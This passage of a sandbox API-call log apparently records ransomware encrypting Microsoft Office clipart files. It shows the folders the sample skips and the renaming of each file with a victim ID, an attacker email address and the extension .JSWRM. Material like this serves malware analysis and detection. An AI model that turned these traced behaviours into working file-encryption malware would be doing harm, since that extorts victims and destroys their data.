ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x614c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107158.WMF", cAlternateFileName="")) returned 1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2=".") returned 1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="..") returned 1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="...") returned 1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="windows") returned -1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="recovery") returned -1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="perflogs") returned -1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="documents and settings") returned 1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="system volume information") returned -1 [0081.919] lstrcmpiW (lpString1="J0107158.WMF", lpString2="msocache") returned -1 [0081.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0081.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107158.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107158.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107158.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0081.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0081.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107158.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107158.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107158.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0081.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0081.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0081.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.920] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24908) returned 1 [0081.920] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6140) returned 0x24d210 [0081.920] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6140, lpOverlapped=0x0) returned 1 [0081.923] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.923] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6140, lpOverlapped=0x0) returned 1 [0081.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.923] CloseHandle (hObject=0x314) returned 1 [0081.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0081.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0081.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0081.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0081.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0081.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0081.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0081.924] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0081.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0081.924] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ee4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107182.WMF", cAlternateFileName="")) returned 1 [0081.924] lstrcmpiW (lpString1="J0107182.WMF", lpString2=".") returned 1 [0081.924] lstrcmpiW (lpString1="J0107182.WMF", lpString2="..") returned 1 [0081.924] lstrcmpiW (lpString1="J0107182.WMF", lpString2="...") returned 1 [0081.925] lstrcmpiW (lpString1="J0107182.WMF", lpString2="windows") returned -1 [0081.925] lstrcmpiW (lpString1="J0107182.WMF", lpString2="recovery") returned -1 [0081.925] lstrcmpiW (lpString1="J0107182.WMF", lpString2="perflogs") returned -1 [0081.925] lstrcmpiW (lpString1="J0107182.WMF", lpString2="documents and settings") returned 1 [0081.925] lstrcmpiW (lpString1="J0107182.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.925] lstrcmpiW (lpString1="J0107182.WMF", lpString2="system volume information") returned -1 [0081.925] lstrcmpiW (lpString1="J0107182.WMF", lpString2="msocache") returned -1 [0081.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0081.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107182.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107182.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107182.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0081.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0081.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107182.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107182.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107182.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0081.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0081.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0081.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.925] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16100) returned 1 [0081.925] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ee0) returned 0x24d210 [0081.925] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3ee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3ee0, lpOverlapped=0x0) returned 1 [0081.929] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.929] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3ee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3ee0, lpOverlapped=0x0) returned 1 [0081.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.929] CloseHandle (hObject=0x314) returned 1 [0081.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0081.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0081.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0081.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0081.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0081.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0081.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.930] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0081.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0081.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.930] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107188.WMF", cAlternateFileName="")) returned 1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2=".") returned 1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="..") returned 1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="...") returned 1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="windows") returned -1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="recovery") returned -1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="perflogs") returned -1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="documents and settings") returned 1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="system volume information") returned -1 [0081.930] lstrcmpiW (lpString1="J0107188.WMF", lpString2="msocache") returned -1 [0081.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0081.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107188.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107188.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107188.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0081.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0081.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107188.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107188.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107188.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0081.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0081.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0081.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0081.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.932] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4536) returned 1 [0081.932] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11b0) returned 0x205850 [0081.933] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x11b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x11b0, lpOverlapped=0x0) returned 1 [0081.935] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.935] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x11b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x11b0, lpOverlapped=0x0) returned 1 [0081.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.935] CloseHandle (hObject=0x314) returned 1 [0081.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0081.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0081.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0081.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0081.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0081.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0081.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0081.935] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0081.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0081.936] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26f0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107192.WMF", cAlternateFileName="")) returned 1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2=".") returned 1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="..") returned 1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="...") returned 1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="windows") returned -1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="recovery") returned -1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="perflogs") returned -1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="documents and settings") returned 1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="system volume information") returned -1 [0081.936] lstrcmpiW (lpString1="J0107192.WMF", lpString2="msocache") returned -1 [0081.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107192.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107192.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107192.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0081.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107192.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 